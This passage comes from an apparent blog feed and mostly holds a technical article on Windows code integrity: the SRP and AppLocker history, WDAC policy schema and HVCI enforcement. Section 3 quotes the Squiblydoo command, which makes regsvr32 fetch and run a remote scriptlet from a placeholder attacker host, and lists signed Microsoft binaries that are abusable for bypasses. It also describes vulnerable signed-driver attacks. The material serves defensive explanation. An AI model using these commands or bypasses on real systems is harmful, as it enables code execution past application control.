&lt;li&gt;Why does the canonical MS15-090 OM-symlink CVE point at CVE-2015-2428 [@nvd-cve-2015-2428] rather than CVE-2015-2528 or CVE-2015-1463?&lt;/li&gt;
&lt;li&gt;What is the structural difference between &lt;code&gt;\??\C:&lt;/code&gt; and &lt;code&gt;\GLOBAL??\C:&lt;/code&gt;, and which one does the HackSys / CVE-2023-35359 worked example abuse?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;Recommended reading.&lt;/strong&gt; Russinovich, Ionescu, and Solomon, &lt;em&gt;Windows Internals, Part 1&lt;/em&gt; (7th edition, Microsoft Press, 2017), Chapter 8 [@microsoftpressstore-wininternals7-part1]. James Forshaw, &lt;em&gt;Windows Security Internals&lt;/em&gt; (No Starch Press, 2024), Chapter 8 [@nostarch-windows-security-internals]. Alex Ionescu, &lt;em&gt;Battle of SKM and IUM&lt;/em&gt;, Black Hat USA 2015 [@ionescu-bh2015-pdf]. The Google Project Zero blog&apos;s symlink mitigations [@p0-symlink-mitigations], arbitrary directory creation [@p0-issue1550], and who contains the containers [@p0-who-contains-containers] posts. James P. Anderson, &lt;em&gt;Computer Security Technology Planning Study&lt;/em&gt; [@csrc-nist-ande72].
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
</content:encoded><category>windows-internals</category><category>object-manager</category><category>kernel</category><category>sandbox</category><category>appcontainer</category><category>security-boundaries</category><category>edr</category><category>vbs</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>WDAC + HVCI: Code Integrity at Every Layer in Windows</title><link>https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/</link><guid isPermaLink="true">https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/</guid><description>How Windows decides which code is allowed to run, end-to-end: WDAC policy schema, HVCI per-VTL SLAT enforcement, the audit-to-enforce loop, and the residual attack surface neither feature can close.</description><pubDate>Mon, 11 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Windows enforces &quot;which code is allowed to run&quot; through two coupled primitives.** WDAC is an XML-schema policy that the in-kernel `CI.dll` evaluates at every PE load. HVCI is the hypervisor-rooted check that runs `SkCi.dll` inside Virtual Trust Level 1, where the VTL0 kernel cannot reach it. Together they form the runtime enforcement loop on top of the App Identity primitives, and together they refuse the 8-microsecond signed-driver load that opens this article. This piece walks the policy schema, the audit-to-enforce migration discipline, the per-VTL SLAT state machine, the Vulnerable Driver Block List, and the residual attack surface (return-oriented programming, signed living-off-the-land binaries, hypervisor rollback) that the loop cannot close.
&lt;h2&gt;1. Signed Code Still Isn&apos;t Trusted Code&lt;/h2&gt;
&lt;p&gt;A red-team operator drops a signed, valid, never-revoked OEM driver onto a freshly-imaged Windows 11 24H2 box with the default WDAC policy enforced and HVCI on. The driver is &lt;code&gt;dbutil_2_3.sys&lt;/code&gt;, a real Dell utility tracked as CVE-2021-21551 [@nvd-cve-2021-21551], with an authentic Microsoft-trusted certificate in its embedded signature. The &lt;code&gt;sc.exe create&lt;/code&gt; call returns success. The &lt;code&gt;StartService&lt;/code&gt; call spins for roughly eight microseconds. Then the driver fails to load with &lt;code&gt;ERROR_DRIVER_BLOCKED&lt;/code&gt;, and the &lt;code&gt;Microsoft-Windows-CodeIntegrity/Operational&lt;/code&gt; event log lights up with event 3033 [@ms-driver-blocklist].&lt;/p&gt;
&lt;p&gt;The driver is not malware. It is a perfectly legitimate diagnostic utility that Dell shipped to hundreds of millions of laptops between 2009 and 2021 [@sentinelone-dbutil], signed by a certificate that chains to a root in the Microsoft Trusted Root Program. The certificate has not expired. It has not been revoked. The driver itself is intact -- not modified, not repacked, not even slightly truncated. And it cannot run.&lt;/p&gt;

A class of attack in which a privileged operator (or an exploited userland process that has reached LocalSystem) loads a driver that is *signed* and *trusted* by the operating system, but contains a vulnerability that lets the loader execute arbitrary code in ring 0. The driver is the vehicle; the vulnerability inside the driver is the payload. The Dell `dbutil_2_3.sys` driver and the MSI Afterburner `RTCore64.sys` driver are the canonical 2018-2024 examples (CVE-2019-16098 [@nvd-cve-2019-16098], CVE-2021-21551 [@nvd-cve-2021-21551]).
&lt;p&gt;That eight-microsecond refusal is the entry point of this article. It raises four questions that the next ten sections answer in order. &lt;em&gt;Which&lt;/em&gt; Windows component refused the load? &lt;em&gt;What&lt;/em&gt; policy language did it consult? &lt;em&gt;How&lt;/em&gt; did that policy reach the device? And, most uncomfortably, &lt;em&gt;which&lt;/em&gt; classes of attack would still get to the kernel anyway?&lt;/p&gt;
&lt;p&gt;This piece sits alongside an earlier post on App Identity [@paragmali-com-app-ide].The App Identity post covers &lt;em&gt;what code identity is&lt;/em&gt; in Windows -- Authenticode, Kernel Mode Code Signing (KMCS), publisher chains, hash strategies. This article argues &lt;em&gt;what Windows does with that identity at every page-fault&lt;/em&gt;. The two pieces compose: identity is the noun; enforcement is the verb. Where App Identity covers what Windows means by &quot;this is the same bag of bytes the publisher signed,&quot; what follows is what the OS does with that fact at every PE load. The two reduce, together, to a single sentence that section five will earn: &lt;em&gt;code integrity at every layer is not a slogan; it is a page-fault sequence that runs dozens of times during one driver load.&lt;/em&gt;&lt;/p&gt;

sequenceDiagram
    participant Op as Operator (sc.exe)
    participant SCM as Service Control Manager
    participant NT as NT Loader (NtLoadDriver)
    participant CI as CI.dll (VTL0)
    participant Sk as SkCi.dll (VTL1)
    participant SLAT as Hypervisor SLAT
    Op-&amp;gt;&amp;gt;SCM: sc.exe create / start
    SCM-&amp;gt;&amp;gt;NT: NtLoadDriver(\dbutil_2_3.sys)
    NT-&amp;gt;&amp;gt;CI: Validate Authenticode + policy
    CI-&amp;gt;&amp;gt;Sk: Secure call: revalidate + check Block List
    Sk-&amp;gt;&amp;gt;Sk: Hash matches Block List entry
    Sk--&amp;gt;&amp;gt;SLAT: Refuse W-&amp;gt;X promotion
    SLAT--&amp;gt;&amp;gt;NT: Page-fault on first execute
    NT--&amp;gt;&amp;gt;SCM: STATUS_DRIVER_BLOCKED
    SCM--&amp;gt;&amp;gt;Op: ERROR_DRIVER_BLOCKED + event 3033
&lt;p&gt;But before we can explain how the load was refused, we have to explain why this kind of refusal is a twenty-five-year-old engineering problem. Two earlier Microsoft answers, Software Restriction Policies and AppLocker, were the wrong shape -- and the wrong shape in instructive ways.&lt;/p&gt;
&lt;h2&gt;2. Historical Origins: The 1990s Free-for-All and the Birth of &quot;Path Is Not Identity&quot;&lt;/h2&gt;
&lt;p&gt;In 2001, a Windows XP user double-clicked a &lt;code&gt;.vbs&lt;/code&gt; attachment and the OS asked nobody before running it. Code Red, Nimda, and MS Blaster had not yet finished teaching Microsoft why that was a bad design, but the theoretical ground was already a decade and a half old. Fred Cohen had proved, in his 1984 paper &lt;em&gt;Computer Viruses -- Theory and Experiments&lt;/em&gt; [@cohen-eecs588], that general malware detection is undecidable -- without detection, containment is, in general, impossible. The verbatim form of that result is reserved for §8 below, where the theoretical-limits argument turns on it. If detection was off the table as a general primitive, the only remaining engineering option was the &lt;em&gt;opposite&lt;/em&gt; of detection: an explicit allowlist.&lt;/p&gt;
&lt;p&gt;Authenticode existed since Internet Explorer 3 in 1996, but it was &lt;em&gt;advisory&lt;/em&gt; -- a &quot;Security Warning&quot; dialog the user could click past. The first OS-level &lt;em&gt;enforcement&lt;/em&gt; primitive arrived with Windows XP and Server 2003 in the form of Software Restriction Policies (SRP) [@learn-microsoft-com-2003-cc782792vws10]). SRP was the first time the kernel was asked to refuse a load on the strength of an administrator-set rule, not a user click.&lt;/p&gt;

The original Windows app-control primitive, introduced with Windows XP and Server 2003. SRP supports four rule classes (path, hash, certificate, zone) and a fixed-precedence walk inside the Safer API call `SaferIdentifyLevel` [@learn-microsoft-com-2003-cc786941vws10]). Deployment is Group Policy only; storage post-download is the registry. SRP was deprecated in Windows 10 build 1803 [@ms-srp-deprecated], with Microsoft&apos;s documentation explicitly redirecting to AppLocker or WDAC.

Microsoft&apos;s PE-image signing scheme [@ms-authenticode-ref], introduced with Internet Explorer 3 in 1996. An Authenticode signature attaches a CMS PKCS#7 envelope to a PE binary, binding the file&apos;s digest to a publisher certificate that chains to a Microsoft-trusted root. The same signature surface is reused by Kernel Mode Code Signing [@ms-acfb-overview], Smart App Control, and the WDAC `Signers` element discussed later in this article.
&lt;p&gt;SRP shipped four ways to identify a binary, but the architectural lesson it forced into the open was about the &lt;em&gt;first&lt;/em&gt; of those four. Path rules looked elegant on paper -- &quot;trust everything in &lt;code&gt;C:\Program Files&lt;/code&gt;&quot; -- and lethal in practice, because a path is not a property of a binary. A path is the &lt;em&gt;coordinates of a place&lt;/em&gt; a bag of bytes happens to sit, and any attacker who can write to that place inherits the trust attached to it. World-writable directories under &lt;code&gt;%TEMP%&lt;/code&gt;, &lt;code&gt;%APPDATA%&lt;/code&gt;, and various inherited-permission folders under &lt;code&gt;C:\Program Files&lt;/code&gt; itself meant that path rules were structurally a lie. Hash rules were correct but brittle; certificate rules were correct but coarse; zone rules were correct but circumventable through a download into a trusted zone.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Path is not identity. A path is a place a bag of bytes happens to sit; an attacker who can write to that place inherits the trust. This sentence will recur three times in this article -- at SRP, at AppLocker, and at WDAC&apos;s path-rule writeability check -- because every generation of Windows app-control re-learned it at a new layer.&lt;/p&gt;
&lt;/blockquote&gt;

gantt
    title Windows app-control + HVCI lineage 2001-2025
    dateFormat  YYYY-MM
    section App-control rail
    SRP (Windows XP)                  :2001-10, 17M
    AppLocker (Windows 7)             :2009-10, 72M
    Configurable CI (Windows 10 1507) :2015-07, 27M
    WDAC rename (1703/1709) + ISG/MI  :2017-04, 24M
    Multi-policy WDAC (1903)          :2019-05, 60M
    ACfB rebrand (2024)               :2024-01, 24M
    section HVCI / VBS rail
    HVCI in Device Guard (1507)       :2015-07, 13M
    HVCI rename (1607)                :2016-08, 20M
    MBEC/GMET reporting (1803)        :2018-04, 25M
    KDP (Windows 10 2004)             :2020-05, 16M
    Driver Block List GA (Win 11 22H2):2022-09, 24M
    KB5042562 Downdate fix            :2025-07, 5M
&lt;p&gt;The first inflection point came when the mass-mailer worms of 2001-2004 made it operationally embarrassing for Microsoft to keep shipping an OS in which &quot;double-click runs anything.&quot; Microsoft&apos;s Trustworthy Computing memo dates to January 2002 [@microsoft-com-trustworthy-computing] -- Bill Gates&apos; company-wide email pivoting Windows engineering toward security as a first-class deliverable. SRP was its first concrete app-control answer.Microsoft&apos;s own Windows Server 2003 SRP technical reference [@learn-microsoft-com-2003-cc786941vws10]) describes the architecture: when a user double-clicks an executable, the enforcement API &lt;code&gt;SaferIdentifyLevel&lt;/code&gt; is called to determine the rule details that apply. The same page enumerates the Safer API, the Group Policy Editor extension, the WinVerifyTrust integration with Authenticode, the Event Viewer logging, and Active Directory + Group Policy as the propagation substrate.&lt;/p&gt;
&lt;p&gt;SRP showed the &lt;em&gt;shape&lt;/em&gt; of the answer -- admin-set policy, OS-enforced, applied before launch -- but it failed on three properties the next generation would try to close. It failed on &lt;em&gt;granularity&lt;/em&gt; because path was its primary identity. It failed on &lt;em&gt;audience&lt;/em&gt; because it had no per-user or per-group scoping. And it failed on &lt;em&gt;surface&lt;/em&gt; because script hosts (&lt;code&gt;wscript.exe&lt;/code&gt;, &lt;code&gt;cscript.exe&lt;/code&gt;) had to opt in to consult its rules. AppLocker arrived in Windows 7 to fix all three. And it discovered that even closing all three is not enough.&lt;/p&gt;
&lt;h2&gt;3. Early Approaches: AppLocker, Squiblydoo, and the Engineering of &quot;Publisher Is Not Enough&quot;&lt;/h2&gt;
&lt;p&gt;April 19, 2016. Casey Smith publishes a four-line command on his subt0x10 blog: &lt;code&gt;regsvr32 /s /n /u /i:http[:]//attacker/x.sct scrobj.dll&lt;/code&gt;. The command bypasses an AppLocker-locked-down workstation with executable and script rules enforced [@casey-smith-wayback], and -- because every default Microsoft AppLocker policy allows binaries published by &lt;code&gt;O=Microsoft Corporation&lt;/code&gt; -- the same trick works against the canonical default rules out of the box. It leaves no registry artefact, requires no admin rights, runs the attacker&apos;s code under the user&apos;s token, and -- this is the part that hurts -- cannot be patched. Because the binary it abuses is signed by Microsoft, it is on every default allowlist. The technique gets the nickname &lt;em&gt;Squiblydoo&lt;/em&gt;, gets MITRE ATT&amp;amp;CK ID T1218.010 [@mitre-t1218-010], gets used in campaigns targeting governments [@mitre-t1218-010], and gets the technique catalogued in the LOLBAS project [@lolbas-regsvr32].&lt;/p&gt;
&lt;p&gt;To understand why Smith&apos;s command was a class of failure rather than a specific bug, look at AppLocker&apos;s design. AppLocker shipped in Windows 7 and Server 2008 R2 (RTM July 2009; GA October 2009) [@wikipedia-windows-7] with five rule collections (Executable, Windows Installer, Script, DLL, Packaged App) crossed against three rule types (Path, File hash, Publisher). Per-user and per-group scoping was the explicit win over SRP, and enforcement moved out of the Safer API into a dedicated Application Identity service (&lt;code&gt;appidsvc&lt;/code&gt;) plus the &lt;code&gt;appid.sys&lt;/code&gt; filter driver [@wikipedia-applocker], so script hosts no longer needed to opt in to consult policy. AppLocker was, on paper, every fix SRP needed.&lt;/p&gt;

The Windows 7 / Server 2008 R2 successor to SRP, with five rule collections (Executable, Windows Installer, Script, DLL, Packaged App) crossed against three rule types (Path, File hash, Publisher). Enforcement is via the `appidsvc` service plus the `appid.sys` filter driver [@learn-microsoft-com-7-dd723678vws10]). Microsoft documents AppLocker today as &quot;a defense-in-depth security feature and not considered a defensible Windows security feature&quot; [@ms-applocker-overview] -- meaning the Microsoft Security Response Center will not service AppLocker bypasses as security vulnerabilities.

A signed, trusted binary that ships with the operating system and exposes functionality an attacker can repurpose for malicious execution -- without dropping any new file to disk, without triggering signature-based detection, and (in the AppLocker era) without violating any publisher-rule allowlist. The MITRE ATT&amp;amp;CK technique T1218 (&quot;System Binary Proxy Execution&quot;) [@mitre-t1218] catalogues the parent class. Microsoft&apos;s own bypass catalogue [@ms-bypass-catalogue] lists about forty Windows binaries that fall into this class.
&lt;p&gt;The Squiblydoo bypass is mechanical once you see it. AppLocker&apos;s publisher rule for &lt;code&gt;O=Microsoft Corporation&lt;/code&gt; says &lt;em&gt;yes&lt;/em&gt; to &lt;code&gt;regsvr32.exe&lt;/code&gt;. The argument-parsing code inside &lt;code&gt;regsvr32.exe&lt;/code&gt; is policy-blind -- it does not consult AppLocker before deciding to follow the &lt;code&gt;/i:URL&lt;/code&gt; flag. The remote scriptlet is fetched, parsed, and the JScript inside it is executed in-process. AppLocker has logged a successful launch of a Microsoft-signed binary and seen nothing worth blocking. The malicious code now runs with the launching user&apos;s token, with no on-disk artefact, with no registry footprint, with no need to escalate.&lt;/p&gt;

sequenceDiagram
    participant U as User session
    participant Reg as regsvr32.exe (signed)
    participant AL as AppLocker check
    participant Atk as attacker.com
    participant JS as JScript engine
    U-&amp;gt;&amp;gt;Reg: Spawn with /i:http://atk/x.sct scrobj.dll
    Reg-&amp;gt;&amp;gt;AL: Publisher = Microsoft Corp?
    AL--&amp;gt;&amp;gt;Reg: PASS (publisher rule allows)
    Reg-&amp;gt;&amp;gt;Atk: GET http://attacker/x.sct (proxy-aware, TLS-capable)
    Atk--&amp;gt;&amp;gt;Reg: Scriptlet (JScript COM)
    Reg-&amp;gt;&amp;gt;JS: Instantiate scriptlet in-process
    JS--&amp;gt;&amp;gt;Reg: Arbitrary code under user token
    Reg--&amp;gt;&amp;gt;AL: Process exit logged &quot;successful launch&quot;
&lt;p&gt;The bypass-research record is the size of a small university faculty. Microsoft&apos;s own bypass catalogue [@ms-bypass-catalogue] thanks fifteen researchers by name in its acknowledgements footer (Casey Smith, Matt Graeber, James Forshaw, Oddvar Moe, Matt Nelson, Will Dormann, Lasse Trolle Borup, Lee Christensen, Jimmy Bayne, Vladas Bulavas, William Easton, Brock Mammen, Kim Oppalfens, Philip Tsukerman, and Alex Ionescu).&lt;/p&gt;
&lt;p&gt;The catalogue itself enumerates roughly forty signed Microsoft binaries that should be blocked unless explicitly required: &lt;code&gt;addinprocess.exe&lt;/code&gt;, &lt;code&gt;bash.exe&lt;/code&gt;, &lt;code&gt;cdb.exe&lt;/code&gt;, &lt;code&gt;cscript.exe&lt;/code&gt;, &lt;code&gt;csi.exe&lt;/code&gt;, &lt;code&gt;dnx.exe&lt;/code&gt;, &lt;code&gt;dotnet.exe&lt;/code&gt;, &lt;code&gt;fsi.exe&lt;/code&gt;, &lt;code&gt;infdefaultinstall.exe&lt;/code&gt;, &lt;code&gt;kd.exe&lt;/code&gt;, &lt;code&gt;kill.exe&lt;/code&gt;, &lt;code&gt;lxrun.exe&lt;/code&gt;, &lt;code&gt;Microsoft.Workflow.Compiler.exe&lt;/code&gt;, &lt;code&gt;msbuild.exe&lt;/code&gt;, &lt;code&gt;mshta.exe&lt;/code&gt;, &lt;code&gt;ntkd.exe&lt;/code&gt;, &lt;code&gt;ntsd.exe&lt;/code&gt;, &lt;code&gt;powershellcustomhost.exe&lt;/code&gt;, &lt;code&gt;rcsi.exe&lt;/code&gt;, &lt;code&gt;runscripthelper.exe&lt;/code&gt;, &lt;code&gt;system.management.automation.dll&lt;/code&gt;, &lt;code&gt;texttransform.exe&lt;/code&gt;, &lt;code&gt;visualuiaverifynative.exe&lt;/code&gt;, &lt;code&gt;wfc.exe&lt;/code&gt;, &lt;code&gt;windbg.exe&lt;/code&gt;, &lt;code&gt;wmic.exe&lt;/code&gt;, &lt;code&gt;wscript.exe&lt;/code&gt;, and &lt;code&gt;wsl.exe&lt;/code&gt; are all explicitly listed.The MITRE ATT&amp;amp;CK record for T1218.010 (Regsvr32) [@mitre-t1218-010] credits Smith for the technique and dates its documented in-the-wild use to multiple &quot;campaigns targeting governments.&quot; The &quot;Squiblydoo&quot; nickname itself is widely attributed to Carbon Black&apos;s April 2016 threat advisory [@carbonblack-squiblydoo-2016], which MITRE cites as reference [3]. The LOLBAS project entry for &lt;code&gt;Regsvr32&lt;/code&gt; [@lolbas-regsvr32] preserves the verbatim AWL bypass syntax that Smith published.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;SRP (2001)&lt;/th&gt;
&lt;th&gt;AppLocker (2009)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Identity primitive&lt;/td&gt;
&lt;td&gt;Path / Hash / Cert / Zone&lt;/td&gt;
&lt;td&gt;Path / Hash / Publisher&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Per-user scoping&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Enforcement engine&lt;/td&gt;
&lt;td&gt;Safer API (&lt;code&gt;SaferIdentifyLevel&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;appidsvc&lt;/code&gt; + &lt;code&gt;appid.sys&lt;/code&gt; filter driver&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Script-host coverage&lt;/td&gt;
&lt;td&gt;Opt-in per host&lt;/td&gt;
&lt;td&gt;Centrally enforced&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Canonical bypass class&lt;/td&gt;
&lt;td&gt;Path-rule writeable directories&lt;/td&gt;
&lt;td&gt;Squiblydoo / publisher-blind LOLBINs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MSRC servicing&lt;/td&gt;
&lt;td&gt;Deprecated 2018&lt;/td&gt;
&lt;td&gt;Defense-in-depth only (not serviced)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Microsoft&apos;s own architectural surrender is in the AppLocker overview [@ms-applocker-overview] itself, in a sentence the company has now repeated for a decade -- captured verbatim in the PullQuote below. The Microsoft Security Response Center, in other words, will not treat an AppLocker bypass as a vulnerability. AppLocker remains supported, remains documented, and remains deployed in millions of enterprises -- but Microsoft has moved its security-boundary commitment to a different feature.&lt;/p&gt;

AppLocker is a defense-in-depth security feature and not considered a defensible Windows security feature. -- Microsoft Learn, AppLocker overview, 2026.

Two insights survive the AppLocker era. First, publisher-only identity is necessary but not sufficient: a bag of bytes signed by Microsoft can still host arbitrary attacker-supplied script. Second, the enforcement engine itself must be unkillable -- AppLocker&apos;s filter driver runs in the same VTL0 ring as the kernel an attacker may have compromised, so a SYSTEM-level kernel attacker can simply unload it. The next generation has to fix both. Microsoft fixed them on two parallel rails inside Windows 10.
&lt;h2&gt;4. The Evolution: Two Parallel Rails Converging on the Runtime Loop&lt;/h2&gt;
&lt;p&gt;From July 2015, Microsoft&apos;s answer evolved on two parallel rails inside Windows 10. One rail -- the configurable Code Integrity policy that would later be renamed WDAC -- replaced AppLocker&apos;s policy language with an XML schema and put the enforcement check inside the kernel. The other rail -- HVCI -- put the &lt;em&gt;kernel CI check itself&lt;/em&gt; underneath the kernel, in a hypervisor-rooted Virtual Trust Level the attacker cannot reach. The rails converged in 2019 with multi-policy WDAC, and again in September 2022 when the Driver Block List started shipping on by default.&lt;/p&gt;
&lt;h3&gt;4a. The WDAC Rail&lt;/h3&gt;
&lt;p&gt;Configurable Code Integrity (CCI) under Device Guard shipped in Windows 10 1507 in July 2015 [@wikipedia-w10-history]. For the first time, Microsoft&apos;s app-control engine consumed an XML policy: a schema with &lt;code&gt;Signers&lt;/code&gt;, &lt;code&gt;FileRules&lt;/code&gt;, &lt;code&gt;SigningScenarios&lt;/code&gt;, and the rule-option toggles that a 2026 administrator still recognises today. The engine binary was &lt;code&gt;CI.dll&lt;/code&gt; [@ms-acfb-overview], and &lt;code&gt;CI.dll&lt;/code&gt; is still the engine binary today. CCI was, from day one, serviced under MSRC criteria [@ms-acfb-overview] -- the load-bearing operational distinction from AppLocker, because Microsoft now treats a bypass of CCI as a security vulnerability.&lt;/p&gt;
&lt;p&gt;The 2017 rebranding decoupled the engine from the marketing. In October 2017 [@ms-2017-wdac-blog] Microsoft published a blog post that admitted, in a sentence that has since become a Microsoft Learn citation, that &quot;we estimate that only about 20% of our customers are using any type of application control technology.&quot; The same post announced the rename from &quot;configurable CI&quot; to &lt;em&gt;Windows Defender Application Control&lt;/em&gt;, and explained that the original Device Guard story had &quot;unintentionally left an impression for many customers that the two features were inexorably linked and could not be deployed separately.&quot;&lt;/p&gt;
&lt;p&gt;The post also disclosed that &quot;in the Windows 10 Creators Update (1703) [@wikipedia-w10-history] released last spring we introduced an option to WDAC called managed installer.&quot; Managed Installer is therefore a 1703 feature (April 2017), not a 1709 feature.This date precision matters. Earlier informal histories pin both ISG and Managed Installer to 1709; the verbatim primary makes Managed Installer a 1703 feature and ISG (rule option 14) a 1709 feature.&lt;/p&gt;

A WDAC policy is an XML document conforming to the SiPolicy schema [@ms-rule-options], evaluated by `CI.dll` at every PE load. The same feature has had four names over a decade: *configurable code integrity* (2015), *Windows Defender Device Guard* (2015-2017), *Windows Defender Application Control* (2017), and *App Control for Business* (the 2024 rename [@ms-acfb-landing]). The binary, the schema, and the runtime loop are unchanged across the renames.

The XML schema that backs every WDAC policy. The eight load-bearing elements are `Rules` (policy options), `Signers` (signer identities), `FileRules` (the `Hash`, `FilePath`, `FileName`, `FilePublisher`, certificate-attribute family), `SigningScenarios` (which split kernel-mode from user-mode coverage), `HvciOptions` (the in-policy HVCI toggle), `UpdatePolicySigners` (who can replace the policy), `SupplementalPolicySigners` (who can add to it), and `CiSigners` (the trusted signer set in the user-mode scenario).

The reputation cloud Microsoft uses for SmartScreen and Defender Antivirus. Enabling rule option 14 [@ms-isg] tells WDAC to consult ISG for &quot;known good,&quot; &quot;known bad,&quot; or &quot;unknown&quot; verdicts at runtime. ISG is not a list; it is a model. Microsoft documents the obvious contraindication: ISG &quot;isn&apos;t recommended for devices that don&apos;t have regular access to the internet.&quot;
&lt;p&gt;The architectural inflection arrived in Windows 10 1903 (May 2019) with multi-policy WDAC [@ms-deploy-multi]. Up to thirty-two active policies could now coexist on a single machine, with base-policy and supplemental-policy composition rules: two base policies intersect (a binary must be allowed by both to run), while a base and a supplemental union (allowed by either is enough). The architectural payoff is operational. The Driver Block List can now ship as a standalone WDAC policy and stack alongside an organisation&apos;s existing allowlist, without a merge-and-resign ceremony every quarter.The thirty-two-policy ceiling has since moved. The Microsoft Learn page on multi-policy deployment [@ms-deploy-multi] documents that the cap is removed on devices that have applied the April 9, 2024 cumulative update -- with one carve-out for Windows 11 21H2, where the limit remains thirty-two indefinitely.&lt;/p&gt;
&lt;p&gt;The 2024 rename to &lt;em&gt;App Control for Business&lt;/em&gt; changed the URL path on Microsoft Learn and not much else. The binary is still &lt;code&gt;CI.dll&lt;/code&gt;; the schema is still &lt;code&gt;SiPolicy&lt;/code&gt;; the rule options are still numbered the same way. Throughout the rest of this article we will use &quot;WDAC&quot; for prose searchability, with the understanding that &quot;App Control for Business,&quot; &quot;configurable code integrity,&quot; and &quot;Device Guard kernel CI&quot; all refer to the same engine.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Four aliases for the same feature: &lt;em&gt;configurable code integrity&lt;/em&gt; (2015), &lt;em&gt;Windows Defender Device Guard&lt;/em&gt; (2015-2017), &lt;em&gt;Windows Defender Application Control / WDAC&lt;/em&gt; (2017-2024), and &lt;em&gt;App Control for Business / ACfB&lt;/em&gt; (2024-). All four consume the same &lt;code&gt;SiPolicy&lt;/code&gt; XML, run against the same &lt;code&gt;CI.dll&lt;/code&gt;, and emit events on the same &lt;code&gt;Microsoft-Windows-CodeIntegrity/Operational&lt;/code&gt; channel. We use &lt;em&gt;WDAC&lt;/em&gt; throughout for searchability; the App Control for Business documentation root [@ms-acfb-landing] is the canonical 2026 entry point.&lt;/p&gt;
&lt;/blockquote&gt;

flowchart LR
    Root[SiPolicy XML]
    Root --&amp;gt; Rules[Rules&lt;br /&gt;policy options 0-20+]
    Root --&amp;gt; Signers[Signers&lt;br /&gt;signer identities]
    Root --&amp;gt; FileRules[FileRules&lt;br /&gt;Hash, FilePath, FileName, FilePublisher]
    Root --&amp;gt; Scenarios[SigningScenarios&lt;br /&gt;KMCI 131, UMCI 12]
    Root --&amp;gt; Hvci[HvciOptions&lt;br /&gt;0, 1, 2, 4]
    Root --&amp;gt; Update[UpdatePolicySigners&lt;br /&gt;who may replace policy]
    Root --&amp;gt; Suppl[SupplementalPolicySigners&lt;br /&gt;who may augment]
    Root --&amp;gt; Ci[CiSigners&lt;br /&gt;trusted signer set in UMCI]
&lt;h3&gt;4b. The HVCI Rail&lt;/h3&gt;
&lt;p&gt;In August 2006, Joanna Rutkowska stood up at Black Hat USA and demonstrated Blue Pill [@en-wikipedia-org-wiki-bluepillsoftware]), a rootkit based on AMD-V hardware virtualization that loaded itself underneath the running operating system. The point was not the rootkit. The point was a threat-model anchor: if attackers can own the hypervisor [@paragmali-com-a-security], no kernel-mode mitigation can trust the kernel below it. The architectural answer Microsoft would eventually deploy is simple to state and hard to build: own the hypervisor first.Rutkowska&apos;s Black Hat USA 2006 presentation [@rutkowska-bh2006] demonstrated Blue Pill against Windows Vista; the deck was 52 pages, the rootkit was an AMD Pacifica (AMD-V) demonstration, and the talk was given on August 3, 2006. Alex Ionescu would invert the same architecture nine years later for HVCI -- the hypervisor is now the &lt;em&gt;defender&apos;s&lt;/em&gt; substrate.&lt;/p&gt;
&lt;p&gt;Device Guard kernel-mode CI / HVCI shipped in Windows 10 1507 in July 2015 [@wikipedia-w10-history] on a hardware-rooted hypervisor that Microsoft built specifically to host this kind of trust check. The architecture is clean. &lt;code&gt;SkCi.dll&lt;/code&gt; runs inside Virtual Trust Level 1, the higher-privileged of the two VTLs the hypervisor exposes. The NT kernel runs in VTL0. When the NT kernel needs to validate a driver image, it asks VTL1 -- and only after VTL1 says yes does the hypervisor flip the SLAT entries for the driver&apos;s code pages from W to X [@ms-kdp-blog].&lt;/p&gt;

The hypervisor-enforced privilege separation that Microsoft introduced with Virtualization-Based Security in Windows 10. VTL0 hosts the normal NT kernel and userland; VTL1 hosts the Secure Kernel and a tiny set of &quot;trustlets&quot; -- LSAISO for Credential Guard, the per-VTL CI engine `SkCi.dll`, the virtual TPM. A SYSTEM-level attacker in VTL0 cannot read or write VTL1 memory; the hypervisor enforces the separation through SLAT permissions. Alex Ionescu&apos;s Battle of SKM and IUM [@github-com-20alex20ionescu20-20201520blackhat2015] is the canonical 2015 primary on the architecture.

Microsoft Learn [@ms-memory-integrity] documents the feature under three names that all refer to the same code path: *memory integrity* (the consumer-facing label in Windows Security), *hypervisor-protected code integrity* (the technical name), and *hypervisor enforced code integrity* (the alternate technical name). The page reads, verbatim: &quot;Memory integrity is sometimes referred to as hypervisor-protected code integrity (HVCI) or hypervisor enforced code integrity, and was originally released as part of Device Guard.&quot;

A page is either writable or executable, but never both. HVCI enforces W$\oplus$X for kernel pages by holding the page write-permission and execute-permission bits in SLAT entries that VTL0 cannot edit [@ms-kdp-blog]. VTL1&apos;s `SkCi.dll` decides whether a page is executable; the hypervisor decides whether VTL0 can ever ask the question. The invariant exists to deny one specific class of attack -- writing a new payload into a kernel page and then executing it -- but it does not stop attacks that compose only of *existing* executable bytes (return-oriented and jump-oriented programming).
